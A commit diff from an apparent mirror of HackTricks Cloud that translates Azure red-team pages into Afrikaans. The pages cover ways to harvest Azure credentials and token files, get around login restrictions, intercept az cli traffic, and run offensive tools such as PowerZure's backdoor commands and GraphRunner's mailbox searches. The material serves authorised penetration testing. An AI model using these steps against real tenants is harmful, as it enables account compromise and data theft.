gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-01 23:39:52 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions
Download Patch File Download Diff File Expand all files Collapse all files

130
src/pentesting-cloud/azure-security/README.md
View File

@@ -2,86 +2,85 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Basiese Inligting
{{#ref}}
az-basic-information/
{{#endref}}
## Azure Pentester/Red Team Methodology
## Azure Pentester/Red Team Metodologie
In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
Om 'n AZURE omgewing te oudit, is dit baie belangrik om te weet: watter **dienste gebruik word**, wat is **blootgestel**, wie het **toegang** tot wat, en hoe is interne Azure dienste en **eksterne dienste** gekoppel.
From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
Vanuit 'n Red Team perspektief, is die **eerste stap om 'n Azure omgewing te kompromitteer** om daarin te slaag om 'n paar **bewyse** vir Azure AD te verkry. Hier is 'n paar idees oor hoe om dit te doen:
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in Azure-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
- The file **`azureProfile.json`** contains **info** about logged user.
- **`az logout`** removes the token.
- Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
Use `Disconnect-AzAccount` to remove them.
- 3rd parties **breached**
- **Internal** Employee
- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
- [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
- **Lekke** in github (of soortgelyk) - OSINT
- **Sosiale** Ingenieurswese
- **Wagwoord** hergebruik (wagwoordlekke)
- Kwesbaarhede in Azure-gehoste toepassings
- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) met toegang tot metadata-eindpunt
- **Plaaslike Lêer Lees**
- `/home/USERNAME/.azure`
- `C:\Users\USERNAME\.azure`
- Die lêer **`accessTokens.json`** in `az cli` voor 2.30 - Jan2022 - gestoor **toegangstokens in duidelike teks**
- Die lêer **`azureProfile.json`** bevat **inligting** oor die ingelogde gebruiker.
- **`az logout`** verwyder die token.
- Ou weergawe van **`Az PowerShell`** het **toegangstokens** in **duidelike** teks in **`TokenCache.dat`** gestoor. Dit stoor ook **ServicePrincipalSecret** in **duidelike** teks in **`AzureRmContext.json`**. Die cmdlet **`Save-AzContext`** kan gebruik word om **tokens** te **stoor**.\
Gebruik `Disconnect-AzAccount` om hulle te verwyder.
- 3de partye **gekompromitteer**
- **Interne** Werknemer
- [**Algemene Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (bewyse of Oauth App)
- [Toestelkode Verifikasie Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- [Azure **Wagwoord Spuit**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
Selfs as jy **nie enige gebruiker** binne die Azure tenant wat jy aanval, gecompromitteer het nie, kan jy **'n paar inligting** daaruit versamel:
{{#ref}}
az-unauthenticated-enum-and-initial-entry/
{{#endref}}
> [!NOTE]
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
> Nadat jy daarin geslaag het om bewese te verkry, moet jy weet **aan wie behoort daardie bewese**, en **waartoe hulle toegang het**, so jy moet 'n paar basiese enumerasie uitvoer:
## Basic Enumeration
## Basiese Enumerasie
> [!NOTE]
> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
> Onthou dat die **luidste** deel van die enumerasie die **inlog** is, nie die enumerasie self nie.
### SSRF
If you found a SSRF in a machine inside Azure check this page for tricks:
As jy 'n SSRF in 'n masjien binne Azure gevind het, kyk hierdie bladsy vir truuks:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
{{#endref}}
### Bypass Login Conditions
### Bypass Inlog Voorwaardes
<figure><img src="../../images/image (268).png" alt=""><figcaption></figcaption></figure>
In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
In gevalle waar jy 'n paar geldige bewese het maar jy kan nie inlog nie, is dit 'n paar algemene beskermings wat in plek kan wees:
- **IP whitelisting** -- You need to compromise a valid IP
- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
- **IP witlys** -- Jy moet 'n geldige IP kompromitteer
- **Geo beperkings** -- Vind waar die gebruiker woon of waar die kantore van die maatskappy is en kry 'n IP van dieselfde stad (of land ten minste)
- **Blaaier** -- Miskien is slegs 'n blaaier van sekere OS (Windows, Linux, Mac, Android, iOS) toegelaat. Vind uit watter OS die slagoffer/maatskappy gebruik.
- Jy kan ook probeer om **Service Principal bewese** te kompromitteer aangesien hulle gewoonlik minder beperk is en hul inlog minder nagegaan word.
After bypassing it, you might be able to get back to your initial setup and you will still have access.
Nadat jy dit omseil het, mag jy in staat wees om terug te keer na jou aanvanklike opstelling en jy sal steeds toegang hê.
### Subdomain Takeover
### Subdomein Oorname
- [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
### Whoami
> [!CAUTION]
> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
> Leer **hoe om** az cli, AzureAD en Az PowerShell in die [**Az - Entra ID**](az-services/az-azuread.md) afdeling te installeer.
One of the first things you need to know is **who you are** (in which environment you are):
Een van die eerste dinge wat jy moet weet is **wie jy is** (in watter omgewing jy is):
{{#tabs }}
{{#tab name="az cli" }}
```bash
az account list
az account tenant list # Current tenant info
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
az ad signed-in-user list-owned-objects # Get owned objects by current user
az account management-group list #Not allowed by default
```
{{#endtab }}
{{#tab name="AzureAD" }}
```powershell
#Get the current session state
Get-AzureADCurrentSessionInfo
#Get details of the current tenant
Get-AzureADTenantDetail
```
{{#endtab }}
{{#tab name="Az PowerShell" }}
```powershell
# Get the information about the current context (Account, Tenant, Subscription etc.)
Get-AzContext
@@ -121,53 +116,49 @@ Get-AzResource
Get-AzRoleAssignment # For all users
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
```
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
> Een van die belangrikste opdragte om Azure te enumerate is **`Get-AzResource`** van Az PowerShell, aangesien dit jou **inligting gee oor die hulpbronne wat jou huidige gebruiker kan sien**.
>
> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
> Jy kan dieselfde inligting in die **webkonsol** kry deur na [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) te gaan of te soek na "Alle hulpbronne"
### ENtra ID Enumeration
By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
You can find here a guide:
Standaard behoort enige gebruiker **voldoende regte te hê om** dinge soos gebruikers, groepe, rolle, diensprincipals... te enumerate (kyk [standaard AzureAD regte](az-basic-information/#default-user-permissions)).\
Jy kan hier 'n gids vind:
{{#ref}}
az-services/az-azuread.md
{{#endref}}
> [!NOTE]
> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
> In the following section you can check some ways to **enumerate some common services.**
> Nou dat jy **'n bietjie inligting oor jou akrediteerings het** (en as jy 'n rooi span is, hoop ek jy **is nie opgespoor nie**). Dit is tyd om uit te vind watter dienste in die omgewing gebruik word.\
> In die volgende afdeling kan jy 'n paar maniere kyk om **'n paar algemene dienste te enumerate.**
## App Service SCM
Kudu console to log in to the App Service 'container'.
Kudu-konsol om in te log in die App Service 'houer'.
## Webshell
Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
Gebruik portal.azure.com en kies die shell, of gebruik shell.azure.com, vir 'n bash of powershell. Die 'skyf' van hierdie shell word as 'n beeldlêer in 'n stoorrekening gestoor.
## Azure DevOps
Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
Azure DevOps is apart van Azure. Dit het repositories, pipelines (yaml of release), borde, wiki, en meer. Veranderlike Groepe word gebruik om veranderlike waardes en geheime te stoor.
## Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Deur die parameter **`--debug`** te gebruik, is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur, te sien:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Om 'n **MitM** na die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
## Automated Recon Tools
## Geoutomatiseerde Verkenning Gereedskap
### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
```powershell
cd ROADTools
pipenv shell
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
roadrecon gather
roadrecon gui
```
### [Monkey365](https://github.com/silverhack/monkey365)
```powershell
Import-Module monkey365
Get-Help Invoke-Monkey365
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
```
### [**Stormspotter**](https://github.com/Azure/Stormspotter)
```powershell
# Start Backend
cd stormspotter\backend\
@@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022!
python stormspotter\stormcollector\sscollector.pyz cli
# This will generate a .zip file to upload in the frontend (127.0.0.1:9091)
```
### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound)
```powershell
# You need to use the Az PowerShell and Azure AD modules:
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
@@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu
## All Azure AD Groups that are synchronized with On-Premise AD
MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n
```
### [Azucar](https://github.com/nccgroup/azucar)
```bash
# You should use an account with at least read-permission on the assets you want to access
git clone https://github.com/nccgroup/azucar.git
@@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
```
### [**MicroBurst**](https://github.com/NetSPI/MicroBurst)
```
Import-Module .\MicroBurst.psm1
Import-Module .\Get-AzureDomainInfo.ps1
Get-AzureDomainInfo -folder MicroBurst -Verbose
```
### [**PowerZure**](https://github.com/hausec/PowerZure)
```powershell
Connect-AzAccount
ipmo C:\Path\To\Powerzure.psd1
@@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner)
```powershell
#Get-GraphTokens
@@ -398,9 +371,4 @@ Get-TenantID -Domain
#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
Invoke-GraphRunner -Tokens $tokens
```
{{#include ../../banners/hacktricks-training.md}}

492
src/pentesting-cloud/azure-security/az-basic-information/README.md
View File

@@ -1,376 +1,372 @@
# Az - Basic Information
# Az - Basiese Inligting
{{#include ../../../banners/hacktricks-training.md}}
## Organization Hierarchy
## Organisasie Hiërargie
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUcVrh1BpuQXN7RzGqoxrn-4Nm_sjdJU-dDTvshloB7UMQnN1mtH9N94zNiPCzOYAqE9EsJqlboZOj47tQsQktjxszpKvIDPZLs9rgyiObcZCvl7N0ZWztshR0ZddyBYZIAwPIkrEQ=s2048?key=l3Eei079oPmVJuh8lxQYxxrB" alt=""><figcaption><p><a href="https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png">https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png</a></p></figcaption></figure>
### Management Groups
### Bestuursgroepe
- It can contain **other management groups or subscriptions**.
- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group.
- **10,000 management** groups can be supported in a single directory.
- A management group tree can support **up to six levels of depth**. This limit doesnt include the root level or the subscription level.
- Each management group and subscription can support **only one parent**.
- Even if several management groups can be created **there is only 1 root management group**.
- The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**.
- All subscriptions within a single management group must trust the **same Entra ID tenant.**
- Dit kan **ander bestuursgroepe of subskripsies** bevat.
- Dit maak dit moontlik om **governance beheer** soos RBAC en Azure-beleid een keer op die bestuursgroepvlak toe te pas en dit **geërf** te laat word deur al die subskripsies in die groep.
- **10,000 bestuurs** groepe kan in 'n enkele gids ondersteun word.
- 'n Bestuursgroepboom kan **tot ses vlakke diepte** ondersteun. Hierdie limiet sluit nie die wortelvlak of die subskripsievlak in nie.
- Elke bestuursgroep en subskripsie kan **slegs een ouer** ondersteun.
- Alhoewel verskeie bestuursgroepe geskep kan word, is daar **slegs 1 wortel bestuursgroep**.
- Die wortel bestuursgroep **bevat** al die **ander bestuursgroepe en subskripsies** en **kan nie verskuif of verwyder** word nie.
- Alle subskripsies binne 'n enkele bestuursgroep moet die **dieselfde Entra ID huur** vertrou.
<figure><img src="../../../images/image (147).png" alt=""><figcaption><p><a href="https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png">https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png</a></p></figcaption></figure>
### Azure Subscriptions
### Azure Subskripsies
- Its another **logical container where resources** (VMs, DBs…) can be run and will be billed.
- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
- It **trust only one Entra ID** directory
- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
- Dit is 'n ander **logiese houer waar hulpbronne** (VM's, DB's…) gedra kan word en gefaktureer sal word.
- Sy **ouer** is altyd 'n **bestuursgroep** (en dit kan die wortel bestuursgroep wees) aangesien subskripsies nie ander subskripsies kan bevat nie.
- Dit **vertrou slegs een Entra ID** gids
- **Toestemmings** wat op die subskripsievlak (of enige van sy ouers) toegepas word, word **geërf** na al die hulpbronne binne die subskripsie
### Resource Groups
### Hulpbron Groepe
[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group.
[Van die dokumentasie:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 'n Hulpbron groep is 'n **houer** wat **verwante hulpbronne** vir 'n Azure-oplossing bevat. Die hulpbron groep kan al die hulpbronne vir die oplossing insluit, of slegs daardie **hulpbronne wat jy as 'n groep wil bestuur**. Oor die algemeen, voeg **hulpbronne** wat die **selfde lewensiklus** deel by die selfde hulpbron groep sodat jy dit maklik kan ontplooi, opdateer, en verwyder as 'n groep.
All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted.
Alle **hulpbronne** moet **binne 'n hulpbron groep** wees en kan slegs aan een groep behoort, en as 'n hulpbron groep verwyder word, word al die hulpbronne daarin ook verwyder.
<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfe8U30iP_vdZCvxX4g8nEPRLoo7v0kmCGkDn1frBPn3_GIoZ7VT2LkdsVQWCnrG_HSYNRRPM-1pSECUkbDAB-9YbUYLzpvKVLDETZS81CHWKYM4fDl3oMo5-yvTMnjdLTS2pz8U67xUTIzBhZ25MFMRkq5koKY=s2048?key=gSyKQr3HTyhvHa28Rf7LVA" alt=""><figcaption><p><a href="https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1">https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&#x26;ssl=1</a></p></figcaption></figure>
### Azure Resource IDs
### Azure Hulpbron ID's
Every resource in Azure has an Azure Resource ID that identifies it.
Elke hulpbron in Azure het 'n Azure Hulpbron ID wat dit identifiseer.
The format of an Azure Resource ID is as follows:
Die formaat van 'n Azure Hulpbron ID is soos volg:
- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
Vir 'n virtuele masjien genaamd myVM in 'n hulpbron groep `myResourceGroup` onder subskripsie ID `12345678-1234-1234-1234-123456789012`, lyk die Azure Hulpbron ID soos volg:
- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
## Azure vs Entra ID vs Azure AD Domain Services
## Azure vs Entra ID vs Azure AD Domein Dienste
### Azure
Azure is Microsofts comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises.
Azure is Microsoft se omvattende **cloud computing platform, wat 'n wye reeks dienste bied**, insluitend virtuele masjiene, databasisse, kunsmatige intelligensie, en stoor. Dit dien as die grondslag vir die gasheer en bestuur van toepassings, die bou van skaalbare infrastruktuur, en die uitvoering van moderne werklas in die wolk. Azure bied gereedskap vir ontwikkelaars en IT-professionals om toepassings en dienste naatloos te skep, te ontplooi, en te bestuur, wat voorsien in 'n verskeidenheid behoeftes van startups tot groot ondernemings.
### Entra ID (formerly Azure Active Directory)
### Entra ID (voorheen Azure Aktiewe Gids)
Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others.
Entra ID is 'n wolk-gebaseerde **identiteit en toegang bestuur diens** wat ontwerp is om autentisering, autorisasie, en gebruikers toegang beheer te hanteer. Dit bied veilige toegang tot Microsoft dienste soos Office 365, Azure, en baie derdeparty SaaS toepassings. Met funksies soos enkel teken-in (SSO), multi-faktor autentisering (MFA), en voorwaardelike toegang beleid onder andere.
### Entra Domain Services (formerly Azure AD DS)
### Entra Domein Dienste (voorheen Azure AD DS)
Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying on-premises domain controllers. This service also supports Group Policy for centralized management, making it suitable for scenarios where legacy or AD-based workloads need to coexist with modern cloud environments.
Entra Domein Dienste brei die vermoëns van Entra ID uit deur **bestuurde domein dienste aan te bied wat versoenbaar is met tradisionele Windows Aktiewe Gids omgewings**. Dit ondersteun ouer protokolle soos LDAP, Kerberos, en NTLM, wat organisasies in staat stel om ouer toepassings in die wolk te migreer of te laat loop sonder om plaaslike domein kontrollers te ontplooi. Hierdie diens ondersteun ook Groep Beleid vir gesentraliseerde bestuur, wat dit geskik maak vir scenario's waar ouer of AD-gebaseerde werklas saam met moderne wolkomgewings moet bestaan.
## Entra ID Principals
### Users
### Gebruikers
- **New users**
- Indicate email name and domain from selected tenant
- Indicate Display name
- Indicate password
- Indicate properties (first name, job title, contact info…)
- Default user type is “**member**”
- **External users**
- Indicate email to invite and display name (can be a non Microsft email)
- Indicate properties
- Default user type is “**Guest**”
- **Nuwe gebruikers**
- Dui e-pos naam en domein van die geselekteerde huur aan
- Dui Vertoonnaam aan
- Dui wagwoord aan
- Dui eienskappe aan (voornaam, posbeskrywing, kontakbesonderhede…)
- Standaard gebruiker tipe is “**lid**”
- **Buitelandse gebruikers**
- Dui e-pos aan om uit te nooi en vertoonnaam (kan 'n nie-Microsoft e-pos wees)
- Dui eienskappe aan
- Standaard gebruiker tipe is “**Gaste**”
### Members & Guests Default Permissions
### Lede & Gaste Standaard Toestemmings
You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
Jy kan dit nagaan in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) maar onder andere aksies sal 'n lid in staat wees om:
- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
- Invite Guests (_can be turned off_)
- Create Security groups
- Read non-hidden Group memberships
- Add guests to Owned groups
- Create new application (_can be turned off_)
- Add up to 50 devices to Azure (_can be turned off_)
- Lees alle gebruikers, Groepe, Toepassings, Toestelle, Rolle, Subskripsies, en hul publieke eienskappe
- Nooi Gaste (_kan afgeskakel word_)
- Skep Sekuriteitsgroepe
- Lees nie-verborgene Groep lidmaatskappe
- Voeg gaste by Besit groepe
- Skep nuwe toepassing (_kan afgeskakel word_)
- Voeg tot 50 toestelle by Azure (_kan afgeskakel word_)
> [!NOTE]
> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
> Onthou dat om Azure hulpbronne te tel, die gebruiker 'n eksplisiete toekenning van die toestemming benodig.
### Users Default Configurable Permissions
### Gebruikers Standaard Konfigureerbare Toestemmings
- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Register Applications: Default **Yes**
- Restrict non-admin users from creating tenants: Default **No**
- Create security groups: Default **Yes**
- Restrict access to Microsoft Entra administration portal: Default **No**
- This doesnt restrict API access to the portal (only web)
- Allow users to connect work or school account with LinkedIn: Default **Yes**
- Show keep user signed in: Default **Yes**
- Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
- Read other users: Default **Yes** (via Microsoft Graph)
- **Guests**
- **Guest user access restrictions**
- **Guest users have the same access as members** grants all member user permissions to guest users by default.
- **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
- **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
- **Guests can invite**
- **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
- **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
- **Only users assigned to specific admin roles can invite guest users**
- **No one in the organization can invite guest users including admins (most restrictive)**
- **External user leave**: Default **True**
- Allow external users to leave the organization
- **Lede (**[**dokumente**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
- Registreer Toepassings: Standaard **Ja**
- Beperk nie-admin gebruikers van die skep van huurders: Standaard **Nee**
- Skep sekuriteitsgroepe: Standaard **Ja**
- Beperk toegang tot Microsoft Entra administrasie portaal: Standaard **Nee**
- Dit beperk nie API toegang tot die portaal nie (slegs web)
- Laat gebruikers toe om werk of skool rekening met LinkedIn te verbind: Standaard **Ja**
- Toon hou gebruiker ingelog: Standaard **Ja**
- Beperk gebruikers van die herstel van die BitLocker sleutel(s) vir hul besit toestelle: Standaard Nee (kyk in Toestel Instellings)
- Lees ander gebruikers: Standaard **Ja** (deur Microsoft Graph)
- **Gaste**
- **Gaste gebruiker toegang beperkings**
- **Gaste gebruikers het dieselfde toegang as lede** gee alle lid gebruiker toestemmings aan gaste gebruikers per standaard.
- **Gaste gebruikers het beperkte toegang tot eienskappe en lidmaatskappe van gids objekte (standaard)** beperk gaste toegang tot slegs hul eie gebruikersprofiel per standaard. Toegang tot ander gebruikers en groep inligting is nie meer toegelaat nie.
- **Gaste gebruiker toegang is beperk tot eienskappe en lidmaatskappe van hul eie gids objekte** is die mees beperkende een.
- **Gaste kan nooi**
- **Enige iemand in die organisasie kan gaste gebruikers nooi insluitend gaste en nie-admins (mees inklusief) - Standaard**
- **Lid gebruikers en gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi insluitend gaste met lid toestemmings**
- **Slegs gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi**
- **Niemand in die organisasie kan gaste gebruikers nooi insluitend admins (mees beperkende)**
- **Buitelandse gebruiker verlaat**: Standaard **Waar**
- Laat buitelandse gebruikers toe om die organisasie te verlaat
> [!TIP]
> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
> Alhoewel dit per standaard beperk is, kan gebruikers (lede en gaste) met toegekenne toestemmings die vorige aksies uitvoer.
### **Groups**
### **Groepe**
There are **2 types of groups**:
Daar is **2 tipes groepe**:
- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
- This will have an **email address** with the domain of the EntraID tenant.
- **Sekuriteit**: Hierdie tipe groep word gebruik om lede toegang te gee tot toepassings, hulpbronne en om lisensies toe te ken. Gebruikers, toestelle, diens prinsipale en ander groepe kan lede wees.
- **Microsoft 365**: Hierdie tipe groep word gebruik vir samewerking, wat lede toegang gee tot 'n gedeelde posbus, kalender, lêers, SharePoint webwerf, ensovoorts. Groep lede kan slegs gebruikers wees.
- Dit sal 'n **e-pos adres** hê met die domein van die EntraID huur.
There are **2 types of memberships**:
Daar is **2 tipes lidmaatskappe**:
- **Assigned**: Allow to manually add specific members to a group.
- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
- **Toegeken**: Laat toe om spesifieke lede handmatig aan 'n groep toe te voeg.
- **Dinamiese lidmaatskap**: Bestuur lidmaatskap outomaties met behulp van reëls, wat die groep insluiting opdateer wanneer lede se eienskappe verander.
### **Service Principals**
### **Diens Prinsipale**
A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
'n **Diens Prinsipaal** is 'n **identiteit** geskep vir **gebruik** met **toepassings**, gehoste dienste, en geoutomatiseerde gereedskap om toegang tot Azure hulpbronne te verkry. Hierdie toegang is **beperk deur die rolle wat aan die diens prinsipaal toegeken is**, wat jou beheer gee oor **watter hulpbronne toegang verkry** en op watter vlak. Om veiligheidsredes, word dit altyd aanbeveel om **diens prinsipale met geoutomatiseerde gereedskap te gebruik** eerder as om hulle toe te laat om met 'n gebruikersidentiteit aan te meld.
It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
Dit is moontlik om **direk as 'n diens prinsipaal aan te meld** deur 'n **geheim** (wagwoord), 'n **sertifikaat**, of deur **federale** toegang aan derdeparty platforms (bv. Github Actions) oor dit te verleen.
